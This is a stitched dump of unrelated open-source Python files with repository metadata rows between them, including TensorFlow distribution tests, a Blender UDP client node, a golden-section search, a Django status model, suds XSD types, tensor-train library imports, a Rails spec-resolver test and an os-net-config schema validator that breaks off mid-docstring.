]),
combinations.times(
combinations.combine(distribution=[
strategy_combinations.one_device_strategy,
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
strategy_combinations.mirrored_strategy_with_two_gpus
]),
combinations.times(
combinations.combine(optimizer_fn=strategy_combinations
.gradient_descent_optimizer_v1_fn),
combinations.combine(
mode=["graph"], use_callable_loss=[True, False]) +
combinations.combine(
mode=["eager"], use_callable_loss=[True])) +
combinations.times(
combinations.combine(optimizer_fn=strategy_combinations
.gradient_descent_optimizer_keras_v2_fn),
combinations.combine(
mode=["graph", "eager"], use_callable_loss=[True]))) +
combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations
.gradient_descent_optimizer_v1_fn,
mode=["graph"],
use_callable_loss=[True, False]) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations
.gradient_descent_optimizer_keras_v2_fn,
mode=["graph"],
use_callable_loss=[True])))
def testMeanVsSum(self, distribution, optimizer_fn, loss_reduction,
use_callable_loss):
with distribution.scope():
all_vars = []
def model_fn(inputs):
x, y = inputs
w = variable_scope.get_variable("w", initializer=[[2.]])
all_vars.append(w)
def loss_fn():
# Use fixed initialization to make the steps deterministic.
predict = math_ops.matmul(x, w)
return losses_impl.mean_squared_error(
y, predict, reduction=loss_reduction)
optimizer = optimizer_fn() # GradientDescent with 0.2 learning rate
if isinstance(optimizer, optimizer_v2.OptimizerV2):
return optimizer.minimize(loss_fn, [w])
else:
if use_callable_loss:
return optimizer.minimize(loss_fn)
else:
return optimizer.minimize(loss_fn())
def dataset_fn():
features = dataset_ops.Dataset.from_tensors([[2.], [7.]])
labels = dataset_ops.Dataset.from_tensors([[6.], [21.]])
return dataset_ops.Dataset.zip((features, labels)).repeat()
def step_fn(ctx, inputs):
del ctx # Unused
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=1).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
run_step()
v = all_vars[0]
self.assertTrue(all(v is vi for vi in all_vars[1:]))
weight = numpy.squeeze(self.evaluate(v))
# Our model is:
# predict = x * w
# loss = (predict - y)^2
# dloss/dpredict = 2*(predict - y)
# dloss/dw = 2 * x^T @ (predict - y)
# For our batch size of 2, assuming sum loss reduction:
# x = [2, 7]
# y = [6, 21]
# w_initial = 2
# predict = [4, 14]
# predict - y = [-2, -7]
# dloss/dw = 2 <[2, 7], [-2, -7]> = - 2(4 + 49) = -106
# So unreplicated the update to w with lr=0.2 is -0.2 * -106 = 21.2
# with sum loss reduction, or 10.6 with mean.
if loss_reduction == losses_impl.Reduction.SUM:
# Note that the "distribution.num_replicas_in_sync" factor will go away
# once we split the input across replicas, instead of pulling a complete
# batch of input per replica.
self.assertNear(weight, 2 + 21.2 * distribution.num_replicas_in_sync,
0.0001)
else:
# One of the mean loss reductions.
self.assertNear(weight, 2 + 10.6, 0.0001)
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_and_v2_optimizers(),
combinations.combine(mode=["graph", "eager"]),
combinations.combine(is_tpu=[False])) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1_and_v2,
mode=["graph"],
is_tpu=[True]))
def testRunStepsWithOutputContext(self, distribution, optimizer_fn, is_tpu):
with distribution.scope():
def dataset_fn():
dataset = dataset_ops.Dataset.from_tensors([[1.]]).repeat()
# TODO(priyag): batch with drop_remainder=True causes shapes to be
# fully defined for TPU. Remove this when XLA supports dynamic shapes.
return dataset.batch(batch_size=1, drop_remainder=True)
optimizer = optimizer_fn()
layer = core.Dense(1, use_bias=True)
key1 = "foo"
value1 = "bar"
def model_fn(output_context, x):
"""A very simple model written by the user."""
def loss_fn():
y = array_ops.reshape(layer(x), []) - constant_op.constant(1.)
return y * y
if isinstance(optimizer, optimizer_v2.OptimizerV2):
train_op = optimizer.minimize(
loss_fn, lambda: layer.trainable_variables)
else:
train_op = optimizer.minimize(loss_fn)
loss = loss_fn()
output_context.set_last_step_output(
name="replica_loss_reduced",
output=loss,
reduce_op=reduce_util.ReduceOp.MEAN)
output_context.set_non_tensor_output(key1, value1)
return (train_op, loss)
def step_fn(output_context, inputs):
(train_op, loss) = distribution.extended.call_for_each_replica(
model_fn, args=(output_context, inputs))
output_context.set_last_step_output(
name="cross_replica_loss_reduced",
output=loss,
reduce_op=reduce_util.ReduceOp.MEAN)
output_context.set_last_step_output(
name="cross_replica_loss_not_reduced",
output=loss)
return distribution.group(train_op)
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
initial_loss = lambda: constant_op.constant(1e7)
# Initial values corresponding to reduced losses are just single
# tensors. But for non reduced losses, we need to have initial
# values that are of the same structure as non reduced losses. In
# MirroredStrategy, this will be a list of losses, in TPUStrategy
# it will be single tensor. Using `call_for_each_replica` followed
# by `experimental_local_results` gives us the desired initial
# value structure.
not_reduced = distribution.experimental_local_results(
distribution.extended.call_for_each_replica(initial_loss))
initial_loop_values = {
"replica_loss_reduced": initial_loss(),
"cross_replica_loss_reduced": initial_loss(),
"cross_replica_loss_not_reduced": not_reduced,
}
ctx = distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=2,
initial_loop_values=initial_loop_values)
self.assertEqual({key1: (value1,)}, ctx.non_tensor_outputs)
self._verify_loss_output(
initial_loss(),
loss_output=ctx.last_step_outputs["replica_loss_reduced"],
reduced=True, distribution=distribution)
self._verify_loss_output(
initial_loss(),
loss_output=ctx.last_step_outputs["cross_replica_loss_reduced"],
reduced=True, distribution=distribution)
self._verify_loss_output(
initial_loss(),
loss_output=ctx.last_step_outputs["cross_replica_loss_not_reduced"],
reduced=False, distribution=distribution)
return (ctx.run_op, ctx.last_step_outputs["replica_loss_reduced"])
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
weights, biases, losses = [], [], []
for _ in range(5):
_, loss = run_step()
losses.append(loss)
weights.append(self.evaluate(layer.kernel))
biases.append(self.evaluate(layer.bias))
loss_is_not_increasing = all(y <= x for x, y in zip(losses, losses[1:]))
self.assertTrue(loss_is_not_increasing)
error = abs(
numpy.add(numpy.squeeze(weights), numpy.squeeze(biases)) - 1)
error_is_not_increasing = all(y <= x for x, y in zip(error, error[1:]))
self.assertTrue(error_is_not_increasing)
def _verify_loss_output(self, initial_loss, loss_output, reduced,
distribution):
if not reduced:
self.assertLen(distribution.experimental_local_results(loss_output),
distribution.num_replicas_in_sync)
loss_tensor = distribution.reduce(reduce_util.ReduceOp.MEAN, loss_output,
axis=None)
else:
unwrapped_output = distribution.experimental_local_results(loss_output)
self.assertLen(unwrapped_output, 1)
loss_tensor = unwrapped_output[0]
self.assertEqual(initial_loss.dtype, loss_tensor.dtype)
self.assertEqual(initial_loss.shape, loss_tensor.shape)
if __name__ == "__main__":
test.main()
| apache-2.0 | 2,174,429,013,716,935,700 | 41.14611 | 82 | 0.62397 | false |
portnov/sverchok | nodes/network/udp_client.py | 1 | 3820 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import socket
import bpy
from bpy.props import IntProperty, FloatProperty, EnumProperty, StringProperty, BoolProperty
from sverchok.node_tree import SverchCustomTreeNode, StringsSocket
from sverchok.utils.profile import profile
from sverchok.data_structure import updateNode
class UdpClientNode(bpy.types.Node, SverchCustomTreeNode):
bl_idname = 'UdpClientNode'
bl_label = 'UDP Client'
def send_msg(self, context):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(0)
sock.sendto(bytes(self.send, 'UTF-8'), (self.ip, self.port))
def recv_msg(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(0)
sock.settimeout(self.timeout)
try:
data, _ = sock.recvfrom(self.buffer_size)
self.receive = data.decode('UTF-8')
except socket.timeout:
print('Timeout')
send = StringProperty(name='send',
description='Message to send',
default='message',
update=send_msg)
receive = StringProperty(name='receive',
description='Received message',
default='',
update=updateNode)
ip = StringProperty(name='ip',
description='IP address of server',
default='127.0.0.1')
port = IntProperty(name='port',
description='Port number to send message',
default=9250)
buffer_size = IntProperty(name='buffer_size',
description='Size of buffer',
default=8192)
timeout = FloatProperty(name='timeout',
description='Timeout (sec)',
default=0.5)
active = BoolProperty(default=False, name='Active')
def draw_buttons(self, context, layout):
layout.prop(self, 'active', text='Active')
layout.prop(self, 'ip', text='IP')
layout.prop(self, 'port', text='Port')
layout.prop(self, 'buffer_size', text='Buffer')
layout.prop(self, 'timeout', text='Timeout')
def sv_init(self, context):
self.inputs.new('StringsSocket', 'send', 'send').prop_name = 'send'
self.outputs.new('StringsSocket', 'receive', 'receive')
@profile
def process(self):
if not self.active:
return
print(type(self.send),type(self.ip),type(self.port))
input_value = self.inputs[0].sv_get()
if self.send != str(input_value):
self.send = str(input_value)
#self.send_msg(bpy.context)
if self.outputs['receive'].is_linked:
self.recv_msg()
self.outputs['receive'].sv_set(self.receive)
def register():
bpy.utils.register_class(UdpClientNode)
def unregister():
bpy.utils.unregister_class(UdpClientNode)
if __name__ == '__main__':
register() | gpl-3.0 | 7,752,315,496,420,771,000 | 32.517544 | 92 | 0.605236 | false |
rlowrance/mlpack | minimize_1d_golden_section.py | 1 | 1783 | '''golden section search to minimize a function of one variable in [low,high]
NOTE: the function fun is assumed to be unimodal
RETURN
low
high, such that the minimizer is in [low,high]
dict, dictionary with function evalutions dict[x] = f(x)
ARGS
fun(x) -> number
low -> number
high -> number
tolerance -> number, required absolute precision of fun(x)
ref: heath-02 p.270 golden section search
'''
import math
import pdb
import unittest
def golden_section(fun, low, high, tolerance, verbose=False):
assert low < high
d = {}
def func(x):
result = fun(x)
d[x] = result
return result
tau = (math.sqrt(5.0) - 1) / 2.0
x1 = low + (1 - tau) * (high - low)
f1 = func(x1)
x2 = low + tau * (high - low)
f2 = func(x2)
while (high - low) > tolerance:
if verbose:
print x1, f1, x2, f2
if f1 > f2:
low = x1
x1 = x2
f1 = f2
x2 = low + tau * (high - low)
f2 = func(x2)
else:
high = x2
x2 = x1
f2 = f1
x1 = low + (1 - tau) * (high - low)
f1 = func(x1)
return low, high, d
class Test(unittest.TestCase):
def setUp(self):
self.verbose = False
def test(self):
# from heath-02 p. 272
def fun(x):
return 0.5 - x * math.exp(- x * x)
low_star, high_star, d = \
golden_section(fun, 0.0, 2.0, .001, verbose=self.verbose)
if self.verbose:
print 'low_star', low_star, 'high_star', high_star
self.assertLess(abs(low_star - .706565), 1e-3)
self.assertLess(abs(high_star - .707471), 1e-3)
if __name__ == '__main__':
if False:
pdb.set_trace()
unittest.main()
| mit | 3,258,253,841,374,939,000 | 22.773333 | 77 | 0.53281 | false |
jdepoix/goto_cloud | goto_cloud/status_model/models.py | 1 | 2281 | from abc import abstractmethod
from django.db import models
from enums.public import StringEnum
from tracked_model.public import TrackedModel
from .lifecycle_management import ObjectStatusLifecycleManager, StatusLifecycle
class StatusModel(TrackedModel):
"""
This Model can be inherited by models which have a status in a lifecycle. The property model.lifecycle_manager
returns a ObjectStatusLifecycleManager containing the relevant lifecycle.
"""
class InvalidStatusException(Exception):
"""
raise if a status is invalid
"""
pass
class Status(StringEnum):
pass
@property
@abstractmethod
def lifecycle(self):
"""
:return: the lifecycle of statuses this StatusModel relies on
:rtype: tuple
"""
raise NotImplementedError('implement abstractproperty lifecycle!')
def __init__(self, *args, **kwargs):
self._status_lifecycle = StatusLifecycle(*self.lifecycle)
self._lifecycle_manager = ObjectStatusLifecycleManager(self._status_lifecycle, self, 'status')
self._meta.get_field('status').default = self._status_lifecycle.statuses[0]
self._meta.get_field('status').choices = self.Status.get_django_choices()
super().__init__(*args, **kwargs)
def save(self, *args, **kwargs):
if not self._lifecycle_manager.is_status_valid(self.status):
raise StatusModel.InvalidStatusException('status: {status} is not valid'.format(
status=self.status
))
return super().save(*args, **kwargs)
status = models.CharField(max_length=255)
def increment_status(self):
"""
increments the status of this StatusModel
:raises: ObjectStatusLifecycleManager.InvalidStatusException in case there is no next status
"""
self.status = self._lifecycle_manager.get_next_status()
self.save()
def decrement_status(self):
"""
decrements the status of this StatusModel
:raises: ObjectStatusLifecycleManager.InvalidStatusException in case there is no previous status
"""
self.status = self._lifecycle_manager.get_previous_status()
self.save()
class Meta:
abstract = True
| mit | 7,181,498,220,778,321,000 | 31.126761 | 114 | 0.665498 | false |
GorillaNation/pipestash | pipestash/__init__.py | 1 | 3148 | import socket
import optparse
def parseargs():
def parse_field_args(option, opt_str, value, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
else:
del parser.rargs[:len(args)]
break
if getattr(parser.values, option.dest):
args.extend(getattr(parser.values, option.dest))
setattr(parser.values, option.dest, args)
# parse command line
parser = optparse.OptionParser()
parser.add_option('-t', '--type', dest='type', help='the event type (required)')
parser.add_option('-r','--redis-url', dest='redis_url', help="specify the URL of the redis database to use, defaults to redis://localhost:6379/0", default='redis://localhost:6379/0')
parser.add_option('-R', '--redis-key', dest='redis_key', help="redis key to add events to, defaults to logstash", default='logstash')
parser.add_option('-T','--tags', dest='tags', action='callback', callback=parse_field_args, help="tags to add to the event", default=[])
parser.add_option('-f', '--fields', dest='fields', action='callback', callback=parse_field_args, metavar='field=value', help="fields to add to the event, FIELD=VALUE, separated by spaces", default=[])
parser.add_option('-s', '--source-path', dest='source_path', help="specify the @source_path field, defaults to 'stdin'", default='stdin')
parser.add_option('-S', '--source-host', dest='source_host', help="specify the @source_host field, defaults to the machine's FQDN", default=socket.getfqdn())
parser.add_option('-O', '--stdout', dest='stdout', help="print read lines to stdout as well as to redis", action="store_true")
parser.add_option('-v', '--verbose', dest='verbose', help="enable verbose mode", action="store_true")
parser.add_option('-q', '--queue-size', dest='queue_size', help="set the maximum size for the internal queue in number of messages, defaults to 10000", default=10000, type="int")
parser.add_option('-B', '--block', dest='block', help="block reads if the queue is full. defaults to False", default=False, action='store_true')
parser.add_option('-w', '--timeout', dest='timeout', help="if pipestash is unable to connect to redis or redis runs OOM, put the consumer thread to sleep a random amount of time between `-w seconds` and +0 seconds. defaults to 20 seconds", default=20, type="float")
parser.add_option('-n', '--nice', dest='nice', help="sets the niceness value of the process", default=5, type="int")
options, _ = parser.parse_args()
# required fields validation
if not options.type:
parser.error('-t|--type is a required argument')
# set source
options.source = "file:///{0}/{1}".format(options.source_host, options.source_path)
# parse out fields
fields = {}
for fieldargs in options.fields:
a,_,b = fieldargs.partition("=")
fields[a] = b
options.fields = fields
# verbose output
if options.verbose:
def verbose(s):
print >> sys.stderr, s
else:
def verbose(s):
pass
return options
| bsd-3-clause | 7,890,449,419,665,262,000 | 55.214286 | 269 | 0.645172 | false |
sfriesel/suds | suds/xsd/sxbuiltin.py | 1 | 6653 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
The I{sxbuiltin} module provides classes that represent
XSD I{builtin} schema objects.
"""
from suds import *
from suds.xsd import *
from suds.sax.date import *
from suds.xsd.sxbase import XBuiltin
import datetime as dt
from logging import getLogger
log = getLogger(__name__)
class XString(XBuiltin):
"""
Represents an (xsd) <xs:string/> node
"""
pass
class XAny(XBuiltin):
"""
Represents an (xsd) <any/> node
"""
def __init__(self, schema, name):
XBuiltin.__init__(self, schema, name)
self.nillable = False
def get_child(self, name):
child = XAny(self.schema, name)
return child, []
def any(self):
return True
class XBoolean(XBuiltin):
"""
Represents an (xsd) boolean builtin type.
"""
translation = ({'1':True, 'true':True, '0':False, 'false':False},
{True:'true', 1:'true', False:'false', 0:'false'})
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring):
return XBoolean.translation[0].get(value)
else:
if isinstance(value, (bool, int)):
return XBoolean.translation[1].get(value)
return value
class XInteger(XBuiltin):
"""
Represents an (xsd) xs:int builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return int(value)
else:
if isinstance(value, int):
return str(value)
return value
class XLong(XBuiltin):
"""
Represents an (xsd) xs:long builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return long(value)
else:
if isinstance(value, (int, long)):
return str(value)
return value
class XFloat(XBuiltin):
"""
Represents an (xsd) xs:float builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return float(value)
else:
if isinstance(value, float):
return str(value)
return value
class XDate(XBuiltin):
"""
Represents an (xsd) xs:date builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return Date(value).date
else:
if isinstance(value, dt.date):
return str(Date(value))
return value
class XTime(XBuiltin):
"""
Represents an (xsd) xs:time builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return Time(value).time
else:
if isinstance(value, dt.date):
return str(Time(value))
return value
class XDateTime(XBuiltin):
"""
Represents an (xsd) xs:datetime builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return DateTime(value).datetime
else:
if isinstance(value, dt.date):
return str(DateTime(value))
return value
class Factory:
tags =\
{
# any
'anyType' : XAny,
# strings
'string' : XString,
'normalizedString' : XString,
'ID' : XString,
'Name' : XString,
'QName' : XString,
'NCName' : XString,
'anySimpleType' : XString,
'anyURI' : XString,
'NOTATION' : XString,
'token' : XString,
'language' : XString,
'IDREFS' : XString,
'ENTITIES' : XString,
'IDREF' : XString,
'ENTITY' : XString,
'NMTOKEN' : XString,
'NMTOKENS' : XString,
# binary
'hexBinary' : XString,
'base64Binary' : XString,
# integers
'int' : XInteger,
'integer' : XInteger,
'unsignedInt' : XInteger,
'positiveInteger' : XInteger,
'negativeInteger' : XInteger,
'nonPositiveInteger' : XInteger,
'nonNegativeInteger' : XInteger,
# longs
'long' : XLong,
'unsignedLong' : XLong,
# shorts
'short' : XInteger,
'unsignedShort' : XInteger,
'byte' : XInteger,
'unsignedByte' : XInteger,
# floats
'float' : XFloat,
'double' : XFloat,
'decimal' : XFloat,
# dates & times
'date' : XDate,
'time' : XTime,
'dateTime': XDateTime,
'duration': XString,
'gYearMonth' : XString,
'gYear' : XString,
'gMonthDay' : XString,
'gDay' : XString,
'gMonth' : XString,
# boolean
'boolean' : XBoolean,
}
@classmethod
def maptag(cls, tag, fn):
"""
Map (override) tag => I{class} mapping.
@param tag: An xsd tag name.
@type tag: str
@param fn: A function or class.
@type fn: fn|class.
"""
cls.tags[tag] = fn
@classmethod
def create(cls, schema, name):
"""
Create an object based on the root tag name.
@param schema: A schema object.
@type schema: L{schema.Schema}
@param name: The name.
@type name: str
@return: The created object.
@rtype: L{XBuiltin}
"""
fn = cls.tags.get(name)
if fn is not None:
return fn(schema, name)
return XBuiltin(schema, name)
| lgpl-3.0 | -2,954,499,898,351,151,600 | 25.505976 | 76 | 0.563655 | false |
Bihaqo/t3f | t3f/__init__.py | 1 | 3157 | from t3f.tensor_train_base import TensorTrainBase
from t3f.tensor_train import TensorTrain
from t3f.tensor_train_batch import TensorTrainBatch
from t3f.variables import assign
from t3f.variables import get_variable
from t3f.ops import add
from t3f.ops import cast
from t3f.ops import flat_inner
from t3f.ops import frobenius_norm
from t3f.ops import frobenius_norm_squared
from t3f.ops import full
from t3f.ops import matmul
from t3f.ops import multiply
from t3f.ops import quadratic_form
from t3f.ops import bilinear_form
from t3f.ops import transpose
from t3f.ops import gather_nd
from t3f.ops import renormalize_tt_cores
from t3f.batch_ops import concat_along_batch_dim
from t3f.batch_ops import gram_matrix
from t3f.batch_ops import multiply_along_batch_dim
from t3f.batch_ops import pairwise_flat_inner
from t3f.initializers import matrix_with_random_cores
from t3f.initializers import matrix_batch_with_random_cores
from t3f.initializers import tensor_with_random_cores
from t3f.initializers import tensor_batch_with_random_cores
from t3f.initializers import random_tensor
from t3f.initializers import random_tensor_batch
from t3f.initializers import random_matrix
from t3f.initializers import random_matrix_batch
from t3f.initializers import tensor_ones
from t3f.initializers import tensor_zeros
from t3f.initializers import matrix_ones
from t3f.initializers import matrix_zeros
from t3f.initializers import eye
from t3f.initializers import ones_like
from t3f.initializers import zeros_like
from t3f.initializers import glorot_initializer
from t3f.initializers import he_initializer
from t3f.initializers import lecun_initializer
from t3f.regularizers import cores_regularizer
from t3f.regularizers import l2_regularizer
from t3f.riemannian import add_n_projected
from t3f.riemannian import pairwise_flat_inner_projected
from t3f.riemannian import project
from t3f.riemannian import project_matmul
from t3f.riemannian import project_sum
from t3f.riemannian import tangent_space_to_deltas
from t3f.shapes import batch_size
from t3f.shapes import clean_raw_shape
from t3f.shapes import expand_batch_dim
from t3f.shapes import is_batch_broadcasting_possible
from t3f.shapes import lazy_batch_size
from t3f.shapes import lazy_raw_shape
from t3f.shapes import lazy_shape
from t3f.shapes import lazy_tt_ranks
from t3f.shapes import raw_shape
from t3f.shapes import shape
from t3f.shapes import squeeze_batch_dim
from t3f.shapes import tt_ranks
from t3f.decompositions import orthogonalize_tt_cores
from t3f.decompositions import round
from t3f.decompositions import to_tt_matrix
from t3f.decompositions import to_tt_tensor
from t3f.autodiff import gradients
from t3f.autodiff import hessian_vector_product
import t3f.approximate
import t3f.kronecker
import t3f.nn
import t3f.utils
_directly_imported = ['tensor_train_base', 'tensor_train', 'tensor_train_batch',
'variables', 'ops', 'batch_ops', 'initializers',
'regularizers', 'riemannian', 'shapes', 'decompositions',
'autodiff']
__all__ = [s for s in dir() if
s not in _directly_imported and not s.startswith('_')]
| mit | 8,852,712,789,191,167,000 | 34.875 | 80 | 0.803928 | false |
sporto/rails_go_to_spec | resolver_test.py | 1 | 5072 | # to run
# python resolver_test.py
import unittest
try:
from .resolver import *
except ImportError:
from resolver import *
class ResolverTest(unittest.TestCase):
def test_is_spec_returns_true(self):
file = '/spec/foo/something_spec.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, True)
def test_is_spec_returns_true_for_erb_spec(self):
file = '/spec/views/something.html.erb_spec.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, True)
def test_is_spec_returns_false(self):
file = '/app/foo/something.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, False)
def test_is_spec_returns_false_for_erb(self):
file = '/spec/views/something.html.erb.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, False)
def test_is_spec_returns_false_for_jbuilder(self):
file = '/spec/views/something.json.jbuilder'
r = Resolver().is_spec(file)
self.assertEqual(r, False)
# get_source
def test_finds_source(self):
file = '/spec/something/foo_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/something/foo.rb')
self.assertEqual(r[1], '/something/foo.rb')
def test_finds_source_from_erb(self):
file = '/spec/views/namespace/users/_something.html.erb_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/namespace/users/_something.html.erb')
self.assertEqual(r[1], '/views/namespace/users/_something.html.erb')
def test_finds_source_from_haml(self):
file = '/spec/views/documents/update.html.haml_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/documents/update.html.haml')
self.assertEqual(r[1], '/views/documents/update.html.haml')
def test_finds_source_from_haml(self):
file = '/spec/views/documents/show.json.jbuilder_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/documents/show.json.jbuilder')
self.assertEqual(r[1], '/views/documents/show.json.jbuilder')
def test_finds_source_from_lib(self):
file = '/spec/lib/something/foo_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/lib/something/foo.rb')
# get_spec
def test_finds_spec(self):
file = '/app/models/user.rb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/models/user_spec.rb')
def test_finds_spec_from_lib(self):
file = '/lib/foo/utility.rb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/lib/foo/utility_spec.rb')
def test_finds_spec_from_erb(self):
file = '/app/views/users/new.html.erb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/views/users/new.html.erb_spec.rb')
def test_finds_spec_from_haml(self):
file = '/app/views/account/login.html.haml'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/views/account/login.html.haml_spec.rb')
def test_finds_spec_from_jbuilder(self):
file = '/app/views/account/show.json.jbuilder'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/views/account/show.json.jbuilder_spec.rb')
def test_finds_spec_from_other(self):
file = '/foo/user.rb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/foo/user_spec.rb')
# run
# returns either the source or spec depending on the given file
def test_run(self):
file = '/app/decorators/namespace/user_decorator.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/decorators/namespace/user_decorator_spec.rb')
def test_run_from_lib(self):
file = '/lib/utilities/namespace/foo.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/lib/utilities/namespace/foo_spec.rb')
def test_run_from_spec(self):
file = '/spec/controllers/namespace/foo_controller_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/controllers/namespace/foo_controller.rb')
self.assertEqual(r[1], '/controllers/namespace/foo_controller.rb')
def test_run_from_spec_lib(self):
file = '/spec/lib/namespace/foo_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/lib/namespace/foo.rb')
def test_run_for_erb_spec(self):
file = '/spec/views/namespace/users/_new.html.erb_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/namespace/users/_new.html.erb')
self.assertEqual(r[1], '/views/namespace/users/_new.html.erb')
def test_run_for_jbuilder_spec(self):
file = '/spec/views/namespace/users/show.json.jbuilder_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/namespace/users/show.json.jbuilder')
self.assertEqual(r[1], '/views/namespace/users/show.json.jbuilder')
if __name__ == '__main__':
unittest.main()
| mit | -3,987,177,846,458,583,600 | 31.935065 | 77 | 0.695386 | false |
openstack/os-net-config | os_net_config/validator.py | 1 | 7202 | # -*- coding: utf-8 -*-
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import jsonschema
import pkg_resources
import yaml
def get_os_net_config_schema():
"""Returns the schema for os_net_config's config files."""
schema_string = pkg_resources.resource_string(__name__, "schema.yaml")
return yaml.safe_load(schema_string)
def get_schema_for_defined_type(defined_type):
"""Returns the schema for a given defined type of the full schema."""
full_schema = get_os_net_config_schema()
type_schema = copy.deepcopy(full_schema["definitions"][defined_type])
type_schema["$schema"] = full_schema["$schema"]
type_schema["definitions"] = full_schema["definitions"]
return type_schema
def validate_config(config, config_name="Config file"):
"""Validates a list of interface/bridge configurations against the schema.
If validation fails, returns a list of validation error message strings.
If validation succeeds, returns an empty list.
`config_name` can be used to prefix errors with a more specific name.
"""
return _validate_config(config, config_name,
get_os_net_config_schema(), True)
def _validate_config(config, config_name, schema, filter_errors):
error_messages = []
validator = jsonschema.Draft4Validator(schema)
v_errors = validator.iter_errors(config)
v_errors = sorted(v_errors, key=lambda e: e.path)
for v_error in v_errors:
error_message = _get_consistent_error_message(v_error)
details = _get_detailed_errors(v_error, 1, v_error.schema_path,
schema, filter_errors=filter_errors)
config_path = '/'.join([str(x) for x in v_error.path])
if details:
error_messages.append(
"{} failed schema validation at network_config/{}:\n"
" {}\n"
" Sub-schemas tested and not matching:\n"
" {}"
.format(config_name, config_path, error_message,
'\n '.join(details)))
else:
error_messages.append(
"{} failed schema validation at network_config/{}:\n"
" {}"
.format(config_name, config_path, error_message))
return error_messages
def _get_consistent_error_message(error):
"""Returns error messages consistent across Python 2 and 3.
jsonschema uses repr() to print its error messages, which means strings
will render as "u'...'" in Python 2 and "'...'" in Python 3, making
testing for error messages unnecessarily difficult.
